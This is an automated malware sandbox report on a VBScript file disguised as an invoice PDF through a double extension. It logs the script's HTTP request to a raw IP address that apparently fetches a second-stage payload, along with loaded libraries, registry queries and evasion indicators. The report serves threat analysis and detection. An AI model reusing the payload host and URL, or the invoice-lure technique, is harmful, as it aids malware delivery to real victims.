Source: #Inv_PI29467018.pdf.vbs |
ReversingLabs: Detection: 18% |
Source: Submitted Sample |
Integrated Neural Analysis Model: Matched 93.8% probability |
Source: Yara match |
File source: #Inv_PI29467018.pdf.vbs, type: SAMPLE |
Source: C:\Windows\System32\wscript.exe |
Network Connect: 41.216.183.13 80 |
Source: Joe Sandbox View |
IP Address: 41.216.183.13 |
Source: Joe Sandbox View |
ASN Name: AS40676US |
Source: global traffic |
HTTP traffic detected: GET /Users_API/gavrels/file_splnzgmx.ozu.txt HTTP/1.1
Accept: */*
Accept-Language: en-ch
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 41.216.183.13
Connection: Keep-Alive |
Source: unknown |
TCP traffic detected without corresponding DNS query: 41.216.183.13 |
Source: wscript.exe, 00000000.00000003.2107641600.000002107CC36000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2107759287.000002107CC3E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://41.216.183. |
Source: wscript.exe, 00000000.00000003.2327531639.000002107D6D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2348637622.000002107D6CB000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://41.216.183.13/Users_API/gavre |
Source: wscript.exe (multiple memory dumps), #Inv_PI29467018.pdf.vbs |
String found in binary or memory: http://41.216.183.13/Users_API/gavrels/file_splnzgmx.ozu.txt |
Source: wscript.exe, 00000000.00000003.2107759287.000002107CC4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2107806609.000002107CC4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2107560179.000002107CC4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2107894778.000002107CC4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2347297777.000002107CC4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2107852065.000002107CC4D000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://41.216.183.13/Users_API/gavrels/file_splnzgmx.ozu.txt. |
Source: wscript.exe, 00000000.00000003.2347247324.000002107ADDF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2348145195.000002107ADEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2347799903.000002107ADEC000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://41.216.183.13/Users_API/gavrels/file_splnzgmx.ozu.txtssesROAMIN |
Source: wscript.exe, 00000000.00000003.2347327797.000002107CC32000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2348423660.000002107CC33000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://41.216.183.13/Users_APhO |
Source: wscript.exe, 00000000.00000003.2327531639.000002107D6D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2348637622.000002107D6CB000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://login.live.com |
Source: C:\Windows\System32\wscript.exe |
COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4} |
Source: #Inv_PI29467018.pdf.vbs |
Initial sample: Strings found which are bigger than 50 |
Source: classification engine |
Classification label: mal84.spre.evad.winVBS@1/0@0/1 |
Source: unknown |
Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#Inv_PI29467018.pdf.vbs" |
Source: C:\Windows\System32\wscript.exe |
Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: C:\Windows\System32\wscript.exe |
Section loaded: version.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: kernel.appcore.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: uxtheme.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: sxs.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: vbscript.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: amsi.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: userenv.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: profapi.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wldp.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: msasn1.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptsp.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: rsaenh.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptbase.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: msisip.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wshext.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrobj.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: mlang.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: msxml6.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: msxml3.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wininet.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: iertutil.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: urlmon.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: srvcli.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: netutils.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: sspicli.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.storage.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: ondemandconnroutehelper.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: winhttp.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: mswsock.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: iphlpapi.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: winnsi.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: textshaping.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: textinputframework.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: coreuicomponents.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: coremessaging.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: ntmarta.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
Source: C:\Windows\System32\wscript.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 |
Source: #Inv_PI29467018.pdf.vbs |
Static PE information: Possible double extension: pdf.vbs |
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe |
Window found: window name: WSH-Timer |
Source: all processes |
Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected |
Source: wscript.exe, 00000000.00000002.2348637622.000002107D6B0000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW0c |
Source: wscript.exe, 00000000.00000003.2327531639.000002107D6F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2348637622.000002107D6F3000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW |
Source: wscript.exe, 00000000.00000002.2348302837.000002107AE9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2346863401.000002107AE83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2347069626.000002107AE96000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2346746822.000002107AE83000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAWi |
Source: C:\Windows\System32\wscript.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid |